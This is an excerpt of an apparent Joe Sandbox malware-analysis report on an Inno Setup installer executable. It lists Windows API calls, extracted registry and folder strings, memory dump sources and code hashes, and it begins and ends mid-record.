• Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
Similarity
• API ID: Find$File$CloseFirstNext
• String ID: unins$unins???.*
• API String ID: 3541575487-1009660736
• Opcode ID: 490a2bf6f62b777b12f8bb075fd261ec892e44da2a65e6c72c5e66397d3a6b60
• Instruction ID: 191fa049ef1442540897bd6b232d6b1da598bf4afdbbee48782243349675ce5a
• Opcode Fuzzy Hash: 490a2bf6f62b777b12f8bb075fd261ec892e44da2a65e6c72c5e66397d3a6b60
• Instruction Fuzzy Hash: 95315074A00548ABCB10EB65CD81BDEB7A9DF45304F50C0B6E40CAB3A2DB789F418B59
Uniqueness

Uniqueness Score: -1.00%

APIs
• FindFirstFileA.KERNEL32(00000000,?,00000000,00452AC3,?,?,-00000001,00000000), ref: 00452A9D
• GetLastError.KERNEL32(00000000,?,00000000,00452AC3,?,?,-00000001,00000000), ref: 00452AA5
Memory Dump Source
• Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
Similarity
• API ID: ErrorFileFindFirstLast
• String ID:
• API String ID: 873889042-0
• Opcode ID: 9c675a8f1f28b386d0fa8c71b8ecb41695e84785a8bb79b0d9bc0322d07a8b6a
• Instruction ID: 3e58272229af866f17ac5928e9872a720c3be2d4903e778e839a846eb7d55d53
• Opcode Fuzzy Hash: 9c675a8f1f28b386d0fa8c71b8ecb41695e84785a8bb79b0d9bc0322d07a8b6a
• Instruction Fuzzy Hash: 94F0F971A04604AB8B10EF669D4149EF7ACEB8672571046BBFC14E3282DAB84E0485A8
Uniqueness

Uniqueness Score: -1.00%

APIs
• GetLocaleInfoA.KERNEL32(?,00000044,?,00000100,0049B4C0,00000001,?,00408633,?,00000000,00408712), ref: 00408586
Memory Dump Source
• Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
Similarity
• API ID: InfoLocale
• String ID:
• API String ID: 2299586839-0
• Opcode ID: 64da881718ef9bfb5c3691e8182369eeaf442f2681d4624e7b5adc518b999176
• Instruction ID: 8daab3ef8e56b0da8b8c23f45c5b5388ad46b50bd825570c2d348c61856efc62
• Opcode Fuzzy Hash: 64da881718ef9bfb5c3691e8182369eeaf442f2681d4624e7b5adc518b999176
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: BFE0223170021466C311AA2A9C86AEAB34C9758310F00427FB904E73C2EDB89E4042A8
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

APIs
• NtdllDefWindowProc_A.USER32(?,?,?,?,?,00424151,?,00000000,0042415C), ref: 00423BAE
Similarity
• API ID: NtdllProc_Window
• String ID:
• API String ID: 4255912815-0
• Opcode ID: 03c86555d74cd6010afd77b9e61a524e96c156e733cd5bd8e2feacc4387cef90
• Instruction ID: a748582893d7571d6ac8bdbe819d0a8fbf5f36db2d3505b6f19a51c7a0bbae16
• Opcode Fuzzy Hash: 03c86555d74cd6010afd77b9e61a524e96c156e733cd5bd8e2feacc4387cef90
• Instruction Fuzzy Hash: 47F0B979205608AF8B40DF99C588D4ABBE8AB4C260B058195B988CB321C234ED808F90
Uniqueness
• Uniqueness Score: -1.00%

APIs
Similarity
• API ID: NameUser
• String ID:
• API String ID: 2645101109-0
• Opcode ID: 969018677e36c7ee3cac7a31a88a81c68082f6a067fe28717e4d5eb0c099a74a
• Instruction ID: 9f318ec9847dd9a6abcb639c8bc611599857aea0b867fcad4bfaeec6bdb042bf
• Opcode Fuzzy Hash: 969018677e36c7ee3cac7a31a88a81c68082f6a067fe28717e4d5eb0c099a74a
• Instruction Fuzzy Hash: 8FD0C27230470473CB00AA689C825AA35CD8B84305F00483E3CC5DA2C3FABDDA485756
Uniqueness
• Uniqueness Score: -1.00%

APIs
• NtdllDefWindowProc_A.USER32(?,?,?,?), ref: 0042F53C
Similarity
• API ID: NtdllProc_Window
• String ID:
• API String ID: 4255912815-0
• Opcode ID: 9e43cbcd657a147b44e82c26281af1c584f356d37a2e763e4ec43db1fd6d4cd6
• Instruction ID: 7ca9c19e24a5def9c493c34941f9da96f9ca037215ec7a65a90973bf7a04e639
• Opcode Fuzzy Hash: 9e43cbcd657a147b44e82c26281af1c584f356d37a2e763e4ec43db1fd6d4cd6
• Instruction Fuzzy Hash: FCD09E7120011D7B9B00DE99E840D6B33AD9B88710B909925F945D7642D634ED9197A5
Uniqueness
• Uniqueness Score: -1.00%

APIs
• Part of subcall function 0046EE44: RegSetValueExA.ADVAPI32(?,Inno Setup: Setup Version,00000000,00000001,00000000,00000001,0047620E,?,0049C1E0,?,0046F15B,?,00000000,0046F6F6,?,_is1), ref: 0046EE67
• Part of subcall function 0046EEB4: RegSetValueExA.ADVAPI32(?,NoModify,00000000,00000004,00000000,00000004,00000001,?,0046F532,?,?,00000000,0046F6F6,?,_is1,?), ref: 0046EEC7
• RegCloseKey.ADVAPI32(?,0046F6FD,?,_is1,?,Software\Microsoft\Windows\CurrentVersion\Uninstall\,00000000,0046F748,?,?,0049C1E0,00000000), ref: 0046F6F0
Strings
Similarity
• API ID: Value$Close
• String ID: " /SILENT$5.5.3 (a)$Comments$Contact$DisplayIcon$DisplayName$DisplayVersion$EstimatedSize$HelpLink$HelpTelephone$Inno Setup: App Path$Inno Setup: Deselected Components$Inno Setup: Deselected Tasks$Inno Setup: Icon Group$Inno Setup: Language$Inno Setup: No Icons$Inno Setup: Selected Components$Inno Setup: Selected Tasks$Inno Setup: Setup Type$Inno Setup: Setup Version$Inno Setup: User$Inno Setup: User Info: Name$Inno Setup: User Info: Organization$Inno Setup: User Info: Serial$InstallDate$InstallLocation$MajorVersion$MinorVersion$ModifyPath$NoModify$NoRepair$Publisher$QuietUninstallString$Readme$RegisterPreviousData$Software\Microsoft\Windows\CurrentVersion\Uninstall\$URLInfoAbout$URLUpdateInfo$UninstallString$_is1
• API String ID: 3391052094-3342197833
• Opcode ID: 41e5a022c9dfc144d242315d0234d20c9f1df57cded100a3ade253d049a3cf6c
• Instruction ID: 0d1426ff9ce9a688a4d167ea33859b9e50b28094dc6fe7db73e07d6bdcf854ec
• Opcode Fuzzy Hash: 41e5a022c9dfc144d242315d0234d20c9f1df57cded100a3ade253d049a3cf6c
• Instruction Fuzzy Hash: D1125935A001089BDB04EF95E881ADE73F5EB48304F24817BE8506B366EB79AD45CF5E
Uniqueness
• Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Control-flow Graph

APIs
• Sleep.KERNEL32(00000000,00000000,00492D3D,?,?,?,?,00000000,00000000,00000000), ref: 00492888
• FindWindowA.USER32(00000000,00000000), ref: 004928B9
Strings
Memory Dump Source
• Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
Similarity
• API ID: FindSleepWindow
• String ID: CALLDLLPROC$CHARTOOEMBUFF$CREATEMUTEX$FINDWINDOWBYCLASSNAME$FINDWINDOWBYWINDOWNAME$FREEDLL$LOADDLL$OEMTOCHARBUFF$POSTBROADCASTMESSAGE$POSTMESSAGE$REGISTERWINDOWMESSAGE$SENDBROADCASTMESSAGE$SENDBROADCASTNOTIFYMESSAGE$SENDMESSAGE$SENDNOTIFYMESSAGE$SLEEP
• API String ID: 3078808852-3310373309
• Opcode ID: 1b144ebbc355c33b94f80a54923ab6cf3df44045a172395cf2688c46c605b401
• Instruction ID: 092cd3663c6e49ee7eb77a287a3c2ed341282e51176ce6ebc4a466309821376d
• Opcode Fuzzy Hash: 1b144ebbc355c33b94f80a54923ab6cf3df44045a172395cf2688c46c605b401
• Instruction Fuzzy Hash: D9C182A0B042003BDB14BF3E9D4551F59A99F95708B119A3FB446EB78BCE7CEC0A4359
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph
APIs
• GetModuleHandleA.KERNEL32(kernel32.dll), ref: 00483A8D
• GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00483A9A
• GetNativeSystemInfo.KERNELBASE(?,00000000,GetNativeSystemInfo,kernel32.dll), ref: 00483AA8
• GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 00483AB0
• GetCurrentProcess.KERNEL32(?,00000000,IsWow64Process), ref: 00483ABC
• GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryA), ref: 00483ADD
• GetModuleHandleA.KERNEL32(advapi32.dll,RegDeleteKeyExA,00000000,GetSystemWow64DirectoryA,?,00000000,IsWow64Process), ref: 00483AF0
• GetProcAddress.KERNEL32(00000000,advapi32.dll), ref: 00483AF6
• GetSystemInfo.KERNEL32(?,00000000,GetNativeSystemInfo,kernel32.dll), ref: 00483B0D
Strings
Memory Dump Source
• Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
Similarity
• API ID: AddressProc$HandleInfoModuleSystem$CurrentNativeProcess
• String ID: GetNativeSystemInfo$GetSystemWow64DirectoryA$IsWow64Process$RegDeleteKeyExA$advapi32.dll$kernel32.dll
• API String ID: 2230631259-2623177817
• Opcode ID: 7dca9948a1095c4364ab55fa8ed369d502b26d1142efbcbd424e95be4cda74f5
• Instruction ID: d1db678d6bd555fecb25ccca0b477ef677e73c145b16f55f8d8b06b946339d0c
• Opcode Fuzzy Hash: 7dca9948a1095c4364ab55fa8ed369d502b26d1142efbcbd424e95be4cda74f5
• Instruction Fuzzy Hash: 7F1181C0204741A4DA00BFB94D45B6F65889B11F2AF040C7B6840AA287EABCEF44A76E
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                    • Part of subcall function 0042DE1C: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,;H,?,00000001,?,?,00483BE3,?,00000001,00000000), ref: 0042DE38
                                                                                                                                                                                                                                  • RegCloseKey.ADVAPI32(?,00468FA2,?,?,00000001,00000000,00000000,00468FBD,?,00000000,00000000,?), ref: 00468F8B
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  • Inno Setup: Selected Components, xrefs: 00468EAA
                                                                                                                                                                                                                                  • Inno Setup: User Info: Serial, xrefs: 00468F6D
                                                                                                                                                                                                                                  • Inno Setup: User Info: Name, xrefs: 00468F47
                                                                                                                                                                                                                                  • Inno Setup: Deselected Components, xrefs: 00468ECC
                                                                                                                                                                                                                                  • Inno Setup: Setup Type, xrefs: 00468E9A
                                                                                                                                                                                                                                  • %s\%s_is1, xrefs: 00468E05
                                                                                                                                                                                                                                  • Inno Setup: Icon Group, xrefs: 00468E66
                                                                                                                                                                                                                                  • Inno Setup: User Info: Organization, xrefs: 00468F5A
                                                                                                                                                                                                                                  • Inno Setup: No Icons, xrefs: 00468E73
                                                                                                                                                                                                                                  • Inno Setup: Deselected Tasks, xrefs: 00468F19
                                                                                                                                                                                                                                  • Inno Setup: App Path, xrefs: 00468E4A
                                                                                                                                                                                                                                  • Inno Setup: Selected Tasks, xrefs: 00468EF7
                                                                                                                                                                                                                                  • Software\Microsoft\Windows\CurrentVersion\Uninstall, xrefs: 00468DE7
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
• Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
Similarity
• API ID: CloseOpen
• String ID: %s\%s_is1$Inno Setup: App Path$Inno Setup: Deselected Components$Inno Setup: Deselected Tasks$Inno Setup: Icon Group$Inno Setup: No Icons$Inno Setup: Selected Components$Inno Setup: Selected Tasks$Inno Setup: Setup Type$Inno Setup: User Info: Name$Inno Setup: User Info: Organization$Inno Setup: User Info: Serial$Software\Microsoft\Windows\CurrentVersion\Uninstall
• API String ID: 47109696-1093091907
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

APIs
  • Part of subcall function 0042D898: GetWindowsDirectoryA.KERNEL32(?,00000104,00000000,00453DB4,00000000,00454066,?,?,00000000,0049B628,00000004,00000000,00000000,00000000,?,004983A5), ref: 0042D8AB
  • Part of subcall function 0042D8C4: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0042D8D7
  • Part of subcall function 0042D8F0: GetModuleHandleA.KERNEL32(kernel32.dll,GetSystemWow64DirectoryA,?,00453B5A,00000000,00453BFD,?,?,00000000,00000000,00000000,00000000,00000000,?,00453FED,00000000), ref: 0042D90A
  • Part of subcall function 0042D8F0: GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 0042D910
• SHGetKnownFolderPath.SHELL32(00499D30,00008000,00000000,?,00000000,0047C942), ref: 0047C846
• 757283B0.OLE32(?,0047C88B), ref: 0047C87E
  • Part of subcall function 0042D208: GetEnvironmentVariableA.KERNEL32(00000000,00000000,00000000,?,?,00000000,0042DA3E,00000000,0042DAD0,?,?,?,0049B628,00000000,00000000), ref: 0042D233
Strings
Memory Dump Source
• Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
Similarity
• API ID: Directory$757283AddressEnvironmentFolderHandleKnownModulePathProcSystemVariableWindows
• String ID: COMMAND.COM$Common Files$CommonFilesDir$Failed to get path of 64-bit Common Files directory$Failed to get path of 64-bit Program Files directory$ProgramFilesDir$SystemDrive$\Program Files$cmd.exe
• API String ID: 795111782-544719455
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

• Executed
• Not Executed
[Control-flow graph image for the function starting at 00423874 not reproduced; only the executed/not-executed legend survives.]
APIs
  • Part of subcall function 0041F3C4: VirtualAlloc.KERNEL32(00000000,00001000,00001000,00000040,?,00000000,0041EDA4,?,0042388F,00423C0C,0041EDA4), ref: 0041F3E2
• GetClassInfoA.USER32(00400000,0042367C), ref: 0042389F
• RegisterClassA.USER32(00499630), ref: 004238B7
• GetSystemMetrics.USER32(00000000), ref: 004238D9
• GetSystemMetrics.USER32(00000001), ref: 004238E8
• SetWindowLongA.USER32(00410460,000000FC,0042368C), ref: 00423944
• SendMessageA.USER32(00410460,00000080,00000001,00000000), ref: 00423965
• GetSystemMenu.USER32(00410460,00000000,00000000,00400000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00423C0C,0041EDA4), ref: 00423970
• DeleteMenu.USER32(00000000,0000F030,00000000,00410460,00000000,00000000,00400000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00423C0C,0041EDA4), ref: 0042397F
• DeleteMenu.USER32(00000000,0000F000,00000000,00000000,0000F030,00000000,00410460,00000000,00000000,00400000,00000000,00000000,00000000,00000000,00000000,00000001), ref: 0042398C
• DeleteMenu.USER32(00000000,0000F010,00000000,00000000,0000F000,00000000,00000000,0000F030,00000000,00410460,00000000,00000000,00400000,00000000,00000000,00000000), ref: 004239A2
Strings
Memory Dump Source
• Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
Similarity
• API ID: Menu$DeleteSystem$ClassMetrics$AllocInfoLongMessageRegisterSendVirtualWindow
• String ID: |6B
• API String ID: 183575631-3009739247
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

• Executed
• Not Executed
[Control-flow graph image for the function starting at 0047CE78 not reproduced; only the executed/not-executed legend survives.]
APIs
• GetProcAddress.KERNEL32(6E290000,SHGetFolderPathA), ref: 0047CF7A
Strings
Memory Dump Source
• Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
Similarity
• API ID: AddressProc
• String ID: Failed to get address of SHGetFolderPath function$Failed to get version numbers of _shfoldr.dll$Failed to load DLL "%s"$SHFOLDERDLL$SHGetFolderPathA$]xI$_isetup\_shfoldr.dll$shell32.dll$shfolder.dll
• API String ID: 190572456-256906917
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

• Executed
• Not Executed
[Control-flow graph image for the function starting at 0040631C not reproduced; only the executed/not-executed legend survives.]
APIs
• GetModuleHandleA.KERNEL32(kernel32.dll,?,00498BC0), ref: 00406322
• GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 0040632F
• GetProcAddress.KERNEL32(00000000,SetSearchPathMode), ref: 00406345
• GetProcAddress.KERNEL32(00000000,SetProcessDEPPolicy), ref: 0040635B
• SetProcessDEPPolicy.KERNEL32(00000001,00000000,SetProcessDEPPolicy,00000000,SetSearchPathMode,kernel32.dll,?,00498BC0), ref: 00406366
Strings
Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: AddressProc$HandleModulePolicyProcess
                                                                                                                                                                                                                                  • String ID: SetDllDirectoryW$SetProcessDEPPolicy$SetSearchPathMode$kernel32.dll
                                                                                                                                                                                                                                  • API String ID: 3256987805-3653653586
                                                                                                                                                                                                                                  • Opcode ID: fb4db72500fb8039bf9e982fa136c472a352d03826636d66c2b82dec8efce00d
                                                                                                                                                                                                                                  • Instruction ID: 935c6a5f7b98c90e27654dc67135d8c1f882d2ad5d8c1b9d0efaf55941893a49
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: fb4db72500fb8039bf9e982fa136c472a352d03826636d66c2b82dec8efce00d
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 97E02D90380702ACEA1032B20D82F3B144C9B54B69B26543B7D56B51C7D9BDDD7059BD
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • SetWindowLongA.USER32(?,000000FC,?), ref: 00413664
                                                                                                                                                                                                                                  • GetWindowLongA.USER32(?,000000F0), ref: 0041366F
                                                                                                                                                                                                                                  • GetWindowLongA.USER32(?,000000F4), ref: 00413681
                                                                                                                                                                                                                                  • SetWindowLongA.USER32(?,000000F4,?), ref: 00413694
                                                                                                                                                                                                                                  • SetPropA.USER32(?,00000000,00000000), ref: 004136AB
                                                                                                                                                                                                                                  • SetPropA.USER32(?,00000000,00000000), ref: 004136C2
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: LongWindow$Prop
                                                                                                                                                                                                                                  • String ID: 3A$yA
                                                                                                                                                                                                                                  • API String ID: 3887896539-3278460822
                                                                                                                                                                                                                                  • Opcode ID: d9856cee796f57cc1685d9958f98130356579251106e4d85d69cc018d86e5275
                                                                                                                                                                                                                                  • Instruction ID: bcb4e109f9bb3244d1d15a250a8b19338fc20a7c4ef9bfc7c396c8b3ff51cb63
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d9856cee796f57cc1685d9958f98130356579251106e4d85d69cc018d86e5275
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8C22D06508E3C05FE31B9B74896A5D57FA0EE13325B1D45DFC4C28B1A3D21E8A8BC71A
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                  control_flow_graph 2894 467180-46722a call 41461c call 41463c call 41461c call 41463c SHGetFileInfo 2903 46725f-46726a call 478e04 2894->2903 2904 46722c-467233 2894->2904 2909 46726c-4672b1 call 42c3fc call 40357c call 403738 ExtractIconA call 4670c0 2903->2909 2910 4672bb-4672ce call 47d33c 2903->2910 2904->2903 2905 467235-46725a ExtractIconA call 4670c0 2904->2905 2905->2903 2932 4672b6 2909->2932 2916 4672d0-4672da call 47d33c 2910->2916 2917 4672df-4672e3 2910->2917 2916->2917 2920 4672e5-467308 call 403738 SHGetFileInfo 2917->2920 2921 46733d-467371 call 403400 * 2 2917->2921 2920->2921 2930 46730a-467311 2920->2930 2930->2921 2931 467313-467338 ExtractIconA call 4670c0 2930->2931 2931->2921 2932->2921
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • SHGetFileInfo.SHELL32(c:\directory,00000010,?,00000160,00001010), ref: 00467223
                                                                                                                                                                                                                                  • ExtractIconA.SHELL32(00400000,00000000,?), ref: 00467249
                                                                                                                                                                                                                                    • Part of subcall function 004670C0: DrawIconEx.USER32(00000000,00000000,00000000,00000000,00000020,00000020,00000000,00000000,00000003), ref: 00467158
                                                                                                                                                                                                                                    • Part of subcall function 004670C0: DestroyCursor.USER32(00000000), ref: 0046716E
                                                                                                                                                                                                                                  • ExtractIconA.SHELL32(00400000,00000000,00000027), ref: 004672A0
                                                                                                                                                                                                                                  • SHGetFileInfo.SHELL32(00000000,00000000,?,00000160,00001000), ref: 00467301
                                                                                                                                                                                                                                  • ExtractIconA.SHELL32(00400000,00000000,?), ref: 00467327
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Icon$Extract$FileInfo$CursorDestroyDraw
                                                                                                                                                                                                                                  • String ID: c:\directory$shell32.dll$%H
                                                                                                                                                                                                                                  • API String ID: 3376378930-166502273
                                                                                                                                                                                                                                  • Opcode ID: d7a251f7ede599729126a20c6e5bc656e487c76ea0efebb03c6af550fa195c4c
                                                                                                                                                                                                                                  • Instruction ID: 732e1a1751fb8a235258c93266195bfa595ebd68417bad8a6af0601d960a2915
